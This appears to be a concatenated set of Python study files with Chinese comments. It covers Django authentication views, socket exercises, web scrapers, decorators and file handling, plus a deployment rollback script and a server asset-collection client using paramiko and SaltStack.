if user_obj: auth.login(request, user_obj) # # 给该次请求设置了session数据,并在响应中回写cookie if next_url: return redirect(next_url) else: return redirect("/book_list/") else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) from django.contrib.auth.models import User # 创建用户auth自带 def reg(request): if request.method == "GET": return render(request, "reg.html") else: username = request.POST.get("username") pwd = request.POST.get("password") user_obj = User.objects.create_user(username=username, password=pwd) # 用auth自带的去创建用户 return redirect("/login/") # class RegView(views.View): # def get(self, request): # return render(request, "reg.html") # # def post(self, request): # username = request.POST.get("username") # pwd = request.POST.get("<PASSWORD>") # # 去数据库中创建用户 # # User.objects.create() --> 直接在数据库创建用户,密码是存的明文的 # user_obj = User.objects.create_user(username=username, password=pwd) # # User.objects.create_superuser() # 创建的超级用户 # return redirect("/login/")<file_sep>/day8/client.py import socket # sk=socket.socket() # #while True: # sk.connect(('127.0.0.1',9100)) # while True: # ret=(sk.recv(1024).decode('utf-8')) # if ret == 'q': break # print(ret) # inp=input('请输入你要发送的消息:') # sk.send(inp.encode('utf-8')) # if inp == 'q': break # # sk.close() <file_sep>/day2/04 集合.py set1 = {1,'alex',False,(1,2,3)} #集合外面是大括号,但是没有冒号,字典也是大括号,有冒号 #元组是()括号,列表是[] #增 # set1.add('bb') # print (set1) # #删除 # set1.pop() ##括号里面不用写东西,是随机删除一个元素的 # print (set1) # # set1.clear() ##清空列表 # print (set1) # del set1 ##删除集合 # print (set1) set3 = {1,2,3,4,5} set2 = {4,5,6,7,8} #交集 & print (set3 & set2) #并集 | union print (set3 | set2) #差集 - difference print (set3 - set2) print (set2 - set3) #反交集 ^ symmetric_difference 就是打印双方都没有的元素 print (set2 ^ set3) set4 = {1,2,3} set5 = {1,2,3,4,5,6} print (set4 < set5) ##返会true 说明set1是set2子集。 print(set4.issubset(set5)) print(set5 > set4) #frozenset 返回一个冻结的集合,冻结后集合不能再添加或删除任何元素。 s = frozenset('barry') s1 = frozenset({4,5,6,7,8}) print(s,type(s)) print(s1,type(s1)) <file_sep>/day20/CMS/static/js/change.js $(".login-box input").focus(function () { $(".error_old").text(""); $(".error_new").text("") } ); <file_sep>/day26/scrapy框架/login/login/spiders/loginpost.py # -*- coding: utf-8 -*- import scrapy class LoginpostSpider(scrapy.Spider): name = 'loginpost' # allowed_domains = ['www.xx.com'] start_urls = ['https://accounts.douban.com/login'] def start_requests(self): data = { 'source': 'movie', 'redir': 'https://movie.douban.com/', 'form_email': '15027900535', 'form_password': '<PASSWORD>', 'login': '登录', } for url in self.start_urls: # 登录页面 yield scrapy.FormRequest(url=url,callback=self.parse,formdata=data) # FormRequest发送的是post请求 def getPageText(self, response): # 这个是用来解析个人主页的数据的 page_text = response.text with open('./douban.html', 'w', encoding='utf-8') as fp: fp.write(page_text) print('over') def parse(self, response): # 对当前用户的个人主页页面进行获取 url = 'https://www.douban.com/people/185687620/' yield scrapy.Request(url=url, callback=self.getPageText) <file_sep>/deploy/script/rollback_script.py #!/usr/bin/env python # -*- coding:utf-8 -*- """ 1. 停掉原来的服务 2. 删除软连接 3. 重新做新版本的软连接 4. 启动新的程序 """ import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = "/home/yx/codes/" WEB_BASE_PATH = "/home/yx/server/" def kill_origin_process(match_key): """ 停掉原来的服务 :param name: :return: """ check_command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' " % (match_key) check_status = check_output(check_command, shell=True) if check_status: command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' | xargs kill -9" % (match_key) check_call(command, shell=True) def link(project_name, version, file_name): """ 软链接 :return: """ web_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name.split('.')[0]) # 代码所在的路径 link_path = os.path.join(WEB_BASE_PATH, project_name) # 代码所运行的目录 if os.path.exists(link_path): os.remove(link_path) # 移除原来的软连接 os.symlink(web_file_path, link_path) # 重新做软连接 return link_path def start_service(project_name, start_command): """ 启动服务 :return: """ command = "%s >/dev/null 2>&1 & " % (start_command,) web_file_path = os.path.join(WEB_BASE_PATH, project_name) # 启动 check_call(command, shell=True, cwd=web_file_path) return True def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] # web_file_path = unpack_zipfile(project_name, version, file_name) kill_status = kill_origin_process('python3 manage.py runserver 0.0.0.0:8001') link_path = link(project_name, version, file_name) start_status = start_service(project_name, 'python3 manage.py runserver 0.0.0.0:8001') if __name__ == '__main__': run()<file_sep>/day9/my_socket_server.py import socketserver import time class Myserver(socketserver.BaseRequestHandler): def handle(self): #必须写这个名字 conn = self.request print(conn) time.sleep(3) conn.send(b'hello') time.sleep(5) conn.send(b'hello2') myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever() # socketserver所启动的服务端是不能有input操作的 # server端一般都是根据client端的要求去执行固定的代码 <file_sep>/day25/爬取搜狗的关键字数据get请求.py import requests #######################爬取的结果是一个网页,基础版 ''' # 指定url url='https://www.sogou.com/web?query=%E9%AD%8F%E6%8C%AF%E6%B5%B7&' # 发起请求 response=requests.get(url=url) # 获取响应对象中的数据值 page_text=response.text # 存储到硬盘 with open('./weizhenhai.html','w',encoding='utf-8')as f: f.write(page_text) ''' ########################优化版,也是爬取一个网页 # 指定搜索关键字 word=input('please input a word you want search:') # 指定url url = 'https://www.sogou.com/web?' # 自定义请求头信息,防止目标网站设置防爬策略 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } # 封装get请求参数 prams = { 'query': word, } # 发起请求 response = requests.get(url=url,params=prams) # 获取响应数据 page_text=response.text # 持久化存储 with open('./baidu.html','w',encoding='utf-8') as f: f.write(page_text) <file_sep>/day15/作业/core/main.py from core import register from core import login # 选择功能函数 def choice(): print("""请选择功能:1注册,2登录""") while True: num = input("请选择你要的功能序号:").strip() if num == "1": register.register() break elif num == "2": login.login() break else: print('你输入的不符合要求') continue choice() <file_sep>/day25/ower/aa.py import requests from lxml import etree import os url = 'https://www.btzhizhu.org/search-%E4%BD%90%E4%BD%90%E6%9C%A8%E5%B8%8C-video-create_time-1.html' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('vadeio'): os.mkdir('vadeio') response = requests.get(url=url, headers=headers) page_html=response.text # print(data) # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_html) url_list = tree.xpath('.//div[@class="table"]//div[@class=" xh-highlight"]') print(url_list) # for url in url_list: # # print(url) # all_url = url.xpath('/html/body/div[1]/table/tbody//tr//a')[0] # print(all_url) # print(all_url) # print(all_url) # for url in all_url: # print(url) <file_sep>/day6/3.初识面向对象.py # 函数 基础数据类型 循环 文件处理 模块 # 游戏公司 # 人狗大战 # 两个角色 # 人 # 昵称 # 性别 # 生命值 # 战斗力 # 背包 # 狗 # 昵称 # 品种 # 生命值 # 战斗力 def Person(name,sex,hp,dps): # 人模子 dic = {'name':name,'sex':sex,'hp':hp,'dps':dps,'bag':[]} def attack(dog): dog['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,剩余%s点血' % (dic['name'], dog['name'], dog['name'], dic['dps'], dog['hp'])) dic['attack'] = attack return dic def Dog(name,kind,hp,dps): # 狗模子 dic = {'name':name,'kind':kind,'hp':hp,'dps':dps} def bite(person): person['hp'] -= dic['dps'] print('%s咬了%s,%s掉了%s点血,剩余%s点血' % (dic['name'], person['name'], person['name'], dic['dps'], person['hp'])) dic['bite'] = bite return dic alex = Person('alex','不详',250,5) ha2 = Dog('哈士奇','藏獒',15000,200) # 人打狗 print(alex) print(ha2) print(alex['attack']) alex['attack'](ha2) print(ha2) # 面向对象的编程思想 # 人狗大战 # 创建一个人 # 创建一个狗 # 人打狗 —— 函数 # 狗咬人 —— 函数 # 造模子 —— 面向对象 # 规范了一类角色的属性项目、属性的名字、技能、技能的名字 # 权限 有一些函数 只能是这个角色才能拥有 才能调用<file_sep>/复习/文件操作.py #r+读写 # with open('log1',encoding='utf-8',mode='r+')as f1: # f1.seek(0,2)###把光标调整到最后,然后再去写,原来的内容不会被覆盖 # # print(f1.read()) # f1.write('555') # f1.seek(0)##然后把光标调整到最前面,再去读 # print(f1.read()) #w写 # with open('log1',encoding='utf-8',mode='w+') as f1: # f1.write('哈哈哈') # f1.seek(0) # print(f1.read()) #a追加和a+可写,可读 # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write('\n很好') # f1.seek(0) # # print(f1.read()) # # with open('log1',encoding='utf-8',mode='a+') as f1: # f1.write('\n很好莫今天是') # f1.seek(0) # print(f1.read()) #文件的改 # import os # with open('log1',encoding='utf-8') as f1,\ # open('log1.bak',encoding='utf-8',mode='w+') as f2: #f1打开源文件,f2创建新文件 # for line in f1: # new_line=line.replace('hahaha','dfdf')#要改变的内容 # f2.write(new_line)#写入到新文件 # f2.seek(0) # print(f2.read()) # os.remove('log1') # os.rename('log1.bak','log1') #tell指针 # with open('log2',encoding='utf-8',mode='a+')as f1: # f1.write('dfdfdfdfdfdf') # print(f1.tell()) #编码转换 # s1 = b'\xd6\xd0\xb9\xfa' # s2 = s1.decode('gbk') # print(s2) # s3 = s2.encode('utf-8') # print(s3) #练习 # 通过代码,将其构建成这种数据类型:[{'name':'apple','price':10,'amount':3}, # {'name':'tesla','price':1000000,'amount':1}......] 并计算出总价钱 new_list=[] total = 0 with open('log1',encoding='utf-8',mode='r') as f1: for i in f1: a=(i.split()) new_list.append({'name':a[0],'price':a[1],'amount':a[2]}) print(new_list) for g in new_list: money = g['price'] count = g['amount'] total = total + int(money) * int(count) print(total)<file_sep>/auto_client/src/client.py from src.plugins import PluginManager from conf import settings import requests from concurrent.futures import ThreadPoolExecutor # 导入线程模块 import json class BaseClient(object): # 公共类,都向服务端发送数据 def __init__(self): self.api = settings.API def post_server_info(self, server_dict): ''' 向服务端发送收集好的信息 :param server_dict: 这是从客户端上面收集到的信息 :return: ''' # requests.post(self.api, data=server_dict) # 通过from表单提交的k=v&k=a用这种方式发送,服务端只能收到key,不能获取value response = requests.post(self.api, json=server_dict) # 1 字典序列化,2 带请求头 content-type;application/json print(response) def exec(self): raise NotImplementedError("必须实现exec方法") class AgentClient(BaseClient): # agent方式 def exec(self): obj = PluginManager() server_dict = obj.exec_plugin() print('采集到服务器信息', server_dict) self.post_server_info(server_dict) # 调用post_server_info向服务端发送数据 class SaltSshClient(BaseClient): # Salt和ssh模式写到一起 def get_host_list(self): response=requests.get(self.api) print(response.text) return json.load(response.text) # 返回一个主机列表 def task(self, host): obj = PluginManager(host) # 实例化一个对象 server_dict = obj.exec_plugin() print(server_dict) self.post_server_info(server_dict) def exec(self): pool = ThreadPoolExecutor(10) # 开启10个线程,每次处理10个 host_list = self.get_host_list() for host in host_list: pool.submit(self.task, host['hostname']) # 异步提交任务和参数 <file_sep>/auto_client/src/plugins/__init__.py from lib.config import settings # 全局的配置文件 import importlib from conf import settings # 用户配置的配置文件 import requests import traceback # 获取详细的报错信息 # def func(): # ''' # 函数版 # :return: # ''' # server_info = {} # # 高度可扩展,可插拔式插件,参考Django源码中的中间件。 # for k, v in settings.PLUGIN_ITEMS.items(): # # 找到v字符串:src.plugins.nic.Nic,src.plugins.disk.Disk # module_path, cls_name = v.rsplit('.', maxsplit=1) # 以点为分隔符,从右边第一个点开始 # module = importlib.import_module(module_path) # 模块名字<module 'src.plugins.disk' # print(module) # cls = getattr(module, cls_name) # 类名src.plugins.disk.Disk' # print(cls) # obj = cls() # ret = obj.process() # 接收函数返回来的值 # server_info[k] = ret # 把k和接收的值存放到字典里面,k是键值 # 类封装版 class PluginManager(): def __init__(self, hostname=None): self.hostname = hostname self.plugin_items = settings.PLUGIN_ITEMS # 插件列表 self.mode = settings.MODE # 收集模式 self.test = settings.TEST if self.mode == "SSH": self.ssh_user = settings.USERNAME self.ssh_port = settings.PORT self.ssh_pwd = <PASSWORD> def exec_plugin(self): ''' 收集插件信息的比如,内存,硬盘,运行每个插件里面的命令 :return: ''' server_info = {} # 高度可扩展,可插拔式插件,参考Django源码中的中间件。 for k, v in settings.PLUGIN_ITEMS.items(): # 去settings配置文件里面循环 info = {'status': True, 'data': None, 'msg': None} # 分别是状态,数据,报错信息 try: # 找到v字符串:src.plugins.nic.Nic,src.plugins.disk.Disk module_path, cls_name = v.rsplit('.', maxsplit=1) # 以点为分隔符,从右边第一个点开始 module = importlib.import_module(module_path) # 模块名字<module 'src.plugins.disk' # print(module) cls = getattr(module, cls_name) # 类名src.plugins.disk.Disk' # print(cls) if hasattr(cls, 'initial'): obj = cls.initial() # 用的静态方法 else: obj = cls() # 实例化一个对象 obj就是每个插件里面的类名,如Disk ret = obj.process(self.exec_cmd, self.test) # 去执行类里面的process方法并接收函数返回来的值 #ret结构:{'eth0': {'up': True, 'hwaddr': '00:1c:42:a5:57:7a', 'ipaddrs': '10.211.55.4', 'netmask': '255.255.255.0'}} info['data'] = ret except Exception as e: info['status'] = False info['msg'] = traceback.format_exc() server_info[k] = info # 把k和接收的值存放到字典里面,k是键值比如nic,memory return server_info def exec_cmd(self, cmd): ''' 判断使用哪种模式 :param cmd:用户传入的命令 :return: ''' if self.mode == "AGENT": import subprocess result = subprocess.getoutput(cmd) elif self.mode == "SSH": import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname=self.hostname, port=self.ssh_port, username=self.ssh_user, password=self.ssh_pwd) stdin, stdout, stderr = ssh.exec_command(cmd) result = stdout.read() ssh.close() elif self.mode == "SALT": import subprocess result = subprocess.getoutput('salt "%s" cmd.run "%s"' % (self.hostname, cmd)) else: raise Exception("模式选择错误:AGENT,SSH,SALT") return result <file_sep>/day27/s21crm/crm/views/userinfo.py from django.shortcuts import render, redirect from crm import models from crm.forms.user import UserInfoModelForm from django.urls import reverse def user_list(request): """ 部门列表 :param request: :return: """ queryset = models.UserInfo.objects.all() return render(request, 'user_list.html', {'queryset': queryset}) def user_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = UserInfoModelForm() return render(request, 'user_add.html', {'form': form}) form = UserInfoModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('user_list') else: return render(request, 'user_add.html', {'form': form}) def user_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.UserInfo.objects.filter(id=nid).first() if request.method == "GET": form = UserInfoModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'user_edit.html', {"form": form}) form = UserInfoModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('user_list') else: return render(request, 'user_edit.html', {"form": form}) def user_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.UserInfo.objects.filter(id=nid).delete() return redirect('user_list') <file_sep>/deploy/script/私钥连接.py import paramiko private_key = paramiko.RSAKey.from_private_key_file(r'C:\Users\Administrator\Desktop\deploy\script\id_rsa') # 前提要把公钥推送到服务器 # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='192.168.7.32', port=22, username='yx', pkey=private_key) # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result.decode()) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/salt.py #!/usr/bin/python # -*- coding:utf-8 -*- from .base import SaltAndSSHHandler class SaltHandler(SaltAndSSHHandler): def cmd(self, command, hostname=None): """ 调用saltstack远程连接主机并执行命令(saltstack的master) :param hostname:主机名 :param command: 要执行的命令 :return: """ import salt.client local = salt.client.LocalClient() result = local.cmd(hostname, 'cmd.run', [command]) return result[hostname] <file_sep>/day22/teplate_about/app01/templatetags/ooxx.py import datetime from django import template register = template.Library() # 把我写的函数注册成一个自定义的filter函数,就能在模板语言里使用了 @register.filter() def alex(arg, delta="7"): try: delta = int(delta) except Exception: delta = 7 # 在原来时间基础上加7天 ret = arg + datetime.timedelta(days=delta) # 把时间对象格式化成字符串格式 return ret.strftime("%Y-%m-%d %H:%M:%S") # 把一个函数注册成自定义的simple_tag @register.simple_tag() def gold(arg1, arg2, arg3): return "{}-{}-{}".format(arg1, arg2, arg3) # 用一些数据去填充一段HTML代码 把HTML代码返回给调用方 # 类似于一个简化版的render(request, "xx.html", {})函数 @register.inclusion_tag(filename="ul.html") def show_menu(arg): #必须传一个参数 ret = [i for i in range(arg)] #返回一个可迭代的对象 return {"num": ret}<file_sep>/day8/解决粘包/client.py import socket import struct sk=socket.socket() sk.connect(('127.0.0.1',8090)) num=sk.recv(4) #先接受bytes的长度 num=struct.unpack('i',num)[0]#提取报文的长度 print(sk.recv(num).decode('utf-8')) print(sk.recv(10)) sk.close()<file_sep>/复习/装饰器.py # # ##最简单的装饰器 # import time # # def func1(): # print('hello world') # time.sleep(0.3) # # def timer(f1): #因为下面timer(func1) 所以,#f1 = func1 # def inner(): # start_time = time.time() # f1() ##相当于执行func1() # end_time = time.time() # print('此函数的执行效率%s' %(end_time - start_time)) # return inner ##inner返回给了func1 # func1 = timer(func1) #等于inner # func1() ##执行inner() #第二种装饰器 import time # def timer(f1): # def inner(): # start_time = time.time() # f1() # end_time = time.time() # print('此函数的执行效率是%s' % (end_time-start_time)) # return inner # # @timer ##func1 = timer(func1) =inner # def func1(): # print('hello world') # time.sleep(0.3) # func1() ##相当于执行了inner() ,然后返回到上面 执行inner里面的语句, # @timer #func1 = timer(func1) =inner # def func2(): # print('你好,世界') # time.sleep(0.4) # func2() #被装饰的函数带参数 # def timer(f1): ##f1 = func1 # def inner (*args,**kwargs): # start_time = time.time() # f1(*args,**kwargs) ##func1函数是在这步开始执行的func1(111,222) # end_time = time.time() # print('此函数的执行效率是%s' %(end_time-start_time)) # return inner # @timer #func1 = timer(func1) ##inner=func1 # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.9) # func1(111,222) ##inner 把 111和222传给了上面的inner(*args) #被装饰的函数带返回值 def timer(f1): def inner(*args,**kwargs): start_time = time.time() ret = f1(*args,**kwargs) ##执行func1(111,222) end_time = time.time() print('此函数执行效率%s' % (end_time-start_time)) return ret ##返回给了func1 return inner @timer #func1 = timer(func1) #func1接收了inner就是func1=inner def func1(a,b): print(a,b) print('hello world') time.sleep(0.4) return 666 ret2 = func1(111,222) ##inner(111,222) print(ret2)<file_sep>/day2/test.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] new = dict() jiage_list = [] b = 0 for v in goods: #去循环goods列表然后给加入id v['id'] = b b += 1 #print (goods) salry = input ("请输入你的金额:") while True: for i in goods: print ( str(i.get("id"))+"\t"+i.get("name") + "\t" + str(i.get("price"))) #print ("%d%s%d % (goods.index(i),i["name"],i["price"])) m = input ("请输入你要购买的商品序号:").strip() if not m.isdigit() or m == '': print ("您输入的不是数字,请重新输入:") continue num = input("请输入你想要购买的个数:").strip() if not num.isdigit(): print ("请输入数字:") continue new.update({m: {"name": goods[int(m)].get("name"), "price": goods[int(m)].get("price"), "num": int(num)}}) print(new) buyTotal = goods[int(m)].get("price") * int(num) print(buyTotal) if int(buyTotal) > int(salry): print("你的余额不够,请充值") continue choiceYN = input("你还需要购买其它商品吗,Y/N: ") if choiceYN == "Y" or choiceYN == "Y".lower(): continue else: break total = 0 print("你购买的商品为:") for k,v in new.items(): print(v.get("name"),v.get("price") * v.get("num")) <file_sep>/day17/lianxi/templates/add_book.html {% extends "mother.html" %} {% block page-main%} <form action="" method="post"> {% csrf_token %} <input type="text" name="title"> <select name="publisher" id=""> {% for publisher in publisher_list %} <option value="{{ publisher.id }}">{{ publisher.name }}</option> {% endfor %} </select> <input type="submit" value="提交"> </form> {% endblock %} <file_sep>/day8/glance/api/policy.py def get(): print('from policy.py')<file_sep>/auto_client/lib/config/__init__.py import os import importlib from . import global_settings class Settings(object): # 这个类是用来获取两个配置文件里面的信息的 # global_settings, 全局配置获取 # settings.py,默认配置获取 def __init__(self): # 这个是获取全局变量里面的值 for item in dir(global_settings): # dir可以查看global_settings里面所有的变量 if item.isupper(): # 如果是大写,才往下执行,item就是k, k = item v = getattr(global_settings, item) # 根据字符串去里面找value setattr(self, k, v) # self是个对象,就相当于self.test=true # 默认 setting_path = os.environ.get('AUTO_CLIENT_SETTINGS') md_settings = importlib.import_module(setting_path) for item in dir(md_settings): if item.isupper(): k = item v = getattr(md_settings, item) # if k == "PLUGIN_ITEMS": # self.PLUGIN_ITEMS.update(v) # else: setattr(self, k, v) settings = Settings() <file_sep>/day7/student_guanlisystem/core/core.py import sys import hashlib from conf import settings from core.manager import Manager from core.student import Student from core.teacher import Teacher def login(): #登录认证,用了动态加盐 user=input('请输入用户名>>>:') pwd=input('请输入密码>>>:') hash_obj=hashlib.md5(user.encode('utf-8')) hash_obj.update(pwd.encode('utf-8')) md5_pwd=hash_obj.hexdigest() with open('../db/userinfo') as f: for line in f: username,passwd,identity=line.strip().split('|') if username==user and passwd ==<PASSWORD>: print('\033[1;32m登录成功!\033[0m') return {'username':user,'identity':identity} #{'username': 'admin', 'identity': 'Manager'} def main(): ret = login() if ret: #如果ret不为空 if hasattr(sys.modules[__name__],ret['identity']): Role_cls=getattr(sys.modules[__name__],ret['identity']) #print(Role_cls) #<class 'core.manager.Manager'> role_obj=Role_cls(ret['username']) # print(role_obj) while True: #一直循环让用户输入 if role_obj==Manager: for num,tup in enumerate(role_obj.Operate_lst,1): print(num,tup[0]) num=input('请输入你要操作的序号:') func_name = role_obj.Operate_lst[int(num)-1][1] #序号对应的内容 if hasattr(role_obj,func_name): getattr(role_obj,func_name)() # elif role_obj==Student: # student.student() <file_sep>/auto_client/bin/test.py # 1. agent形式在每个客户端上面运行 # import subprocess # result = subprocess.getoutput("dir") # print(result) # 2. SSH模式必须用paramiko模块 ,在一个中控机上面运行,相当于跳板机 import paramiko #用户名密码方式 ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname='172.16.58.3', port=8888, username='root', password='<PASSWORD>') stdin, stdout, stderr = ssh.exec_command('ifconfig') result = stdout.read() ssh.close() print(result) # 公钥私钥方式 # import paramiko # private_key = paramiko.RSAKey.from_private_key_file('/home/auto/.ssh/id_rsa') # ssh = paramiko.SSHClient() # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # ssh.connect(hostname='c1.salt.com', port=22, username='wupeiqi', pkey=private_key) # stdin, stdout, stderr = ssh.exec_command('df') # result = stdout.read() # ssh.close() # 3. SaltStack模式 在saltstack主上面运行 # import subprocess # subprocess.getoutput('salt "c1.com" cmd.run "命令"')<file_sep>/day5/作业.py import re res = re.compile('\([^()]+\)') ##匹配最小单位的括号 def check_rede_and_except(s): ##检测表达式里面是否有乘除法 s1=s.replace(' ','') l = re.findall('([\d\.]+|/|-|\+|\*)',s1) ##['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', '+', '9'] while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l,'*') elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l,'/') elif '/' in l and '*' in l: a=l.index('*') b=l.index('/') if a<b: ret = jisuan_rede_and_except(l,'*') else: ret = jisuan_rede_and_except(l,'/') else: break return jisuan_jia_and_jian(ret) def jisuan_rede_and_except(l,x): ##计算乘除 #print("l:%s %s:x" % (l,x)) # print(l) a = l.index(x) if x=='*' and l[a+1] !='-': k=float(l[a-1]) * float(l[a+1]) elif x=='/' and l[a+1] !='-': k=float(l[a-1]) / float(l[a+1]) elif x=='*' and l[a+1] =='-': k=-(float(l[a-1]) * float(l[a+2])) elif x=='/' and l[a+1] =='-': k=-(float(l([a-1])) / float(l[a+2])) del l[a-1],l[a-1], l[a-1] l.insert(a-1,str(k)) return l ##['100.5', '+', '100.0', '-', '3.0', '+', '9'] def jisuan_jia_and_jian(l): ##计算加减 sum = 0 while l: ##l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] ##把1删除 sum += float(l[0]) for i in range(1, len(l), 2): ##取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum # print('我是sum:%s'%(sum)) def calculate(expression): if not re.search(r'\([^()]+\)', expression): # 匹配最里面的括号,如果没有的话,直接进行运算,得出结果 return check_rede_and_except(expression) k = re.search(r'\([^()]+\)', expression).group() ##取出最小括号里面的值 # print(k) expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) #print(expression) return calculate(expression) print('我是eval:%s'%(eval('1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )'))) s= '1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )' # s2='9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14' #print(eval('9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14')) print(calculate(s)) # check_rede_and_except(s2)<file_sep>/day25/bs4 爬取三国.py #!/usr/bin/env python # -*- coding:utf-8 -*- import requests from bs4 import BeautifulSoup headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } def parse_content(url): # 获取标题正文页数据 page_text = requests.get(url, headers=headers).text soup = BeautifulSoup(page_text, 'lxml') # 解析获得标签 ele = soup.find('div', class_='chapter_content') content = ele.text # 获取标签中的数据值 return content if __name__ == "__main__": url = 'http://www.shicimingju.com/book/sanguoyanyi.html' reponse = requests.get(url=url, headers=headers) page_text = reponse.text # 创建soup对象 soup = BeautifulSoup(page_text, 'lxml') # 解析数据 a_eles = soup.select('.book-mulu > ul > li > a') print(a_eles) cap = 1 for ele in a_eles: print('开始下载第%d章节' % cap) cap += 1 title = ele.string content_url = 'http://www.shicimingju.com' + ele['href'] content = parse_content(content_url) with open('./sanguo.txt', 'a',encoding='utf-8') as fp: fp.write(title + ":" + content + '\n\n\n\n\n') print('结束下载第%d章节' % cap) <file_sep>/复习/进程.py from multiprocessing import Process import time # # # def task(name): # print('%s piaoing' % name) # time.sleep(2) # print("%s is down" % name) # # # if __name__ == '__main__': # windows上面开启进程必须写这个 # # target目标,args传参 # p = Process(target=task, args=('alex',)) # 开启一个进程 # p1 = Process(target=task, args=('egon',)) # p.start() # 给操作系统发送一个指令 # p1.start() # print("主") # # from threading import Thread # import time # def sayhi(name): # time.sleep(2) # print('%s say hello' %name) # # if __name__ == '__main__': # t=Thread(target=sayhi,args=('egon',)) # t.start() # print('主线程') from threading import Thread from multiprocessing import Process import os def work(): print('hello') if __name__ == '__main__': #在主进程下开启线程 t=Thread(target=work) t.start() print('主线程/') ''' 打印结果: hello 主线程/主进程 ''' #在主进程下开启子进程 t=Process(target=work) t.start() print('/主进程') ''' 打印结果: 主线程/主进程 hello ''' <file_sep>/day2/01 str.py #切片 # * capitalize 首字母大写,其他字母小写 #* 大小写反转 swapcase() # *** 全部大写upper() 全部小写lower() #*非字母的元素隔开的每个单词首字母大写 title() #center 居中,长度自己设定,默认填充物None # *** startswith endswith # *** strip 去除首尾的空格,制表符\t,换行符。不仅仅是去除空格....也可以去除任意字符 #*** split (str ---> list) 不太懂 #join 将list --->str # #replace 替换 #find 通过元素找索引 找不到返回-1 # index 通过元素找索引 找不到报错 #格式化输出format #公共方法:len count <file_sep>/deploy/web/forms/depart.py # ModelForm有两大功能 # 1. 生成HTMl标签 # 2. 表单校验 from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class DepartModelForm(BootStrapModelForm): class Meta: model = models.Department fields = "__all__"<file_sep>/day16/s21/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import models from app01 import my_md5 # 登录页面 # def login(request): if request.method == "POST": user = request.POST.get("username") # 这里的username必须和html里面的name的值一致 pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名或密码不能为空' return render(request, "login.html", {"data": data}) else: try: obj = models.User.objects.get(username=user) except Exception: data = "此用户不存在" return render(request, "login.html", {"data": data}) if obj.username == user and obj.password == <PASSWORD>(user, pwd): request.session.set_expiry(0) request.session['user'] = obj.username return redirect("/show_user/") else: data = '用户名和密码错误' return render(request, "login.html", {"data": data}) else: return render(request, 'login.html') # 展示页面 def show_user(request): data = models.User.objects.all() v = request.session.get('user') # 获取登录的用户名 if v: return render(request, "show_user.html", {"data": data, "v": v}) else: return redirect('/login/') # 注册页面 def register_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": # return HttpResponse("用户名和密码不能为空") data = '用户名和密码不能为空' return render(request, "register_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "register_user.html", {"data": data}) data = '注册成功,请登录' return render(request, "register_user.html", {"data": data}) else: return render(request, "register_user.html") # 删除用户 def del_user(request): # 获取用户要删除的id del_id = 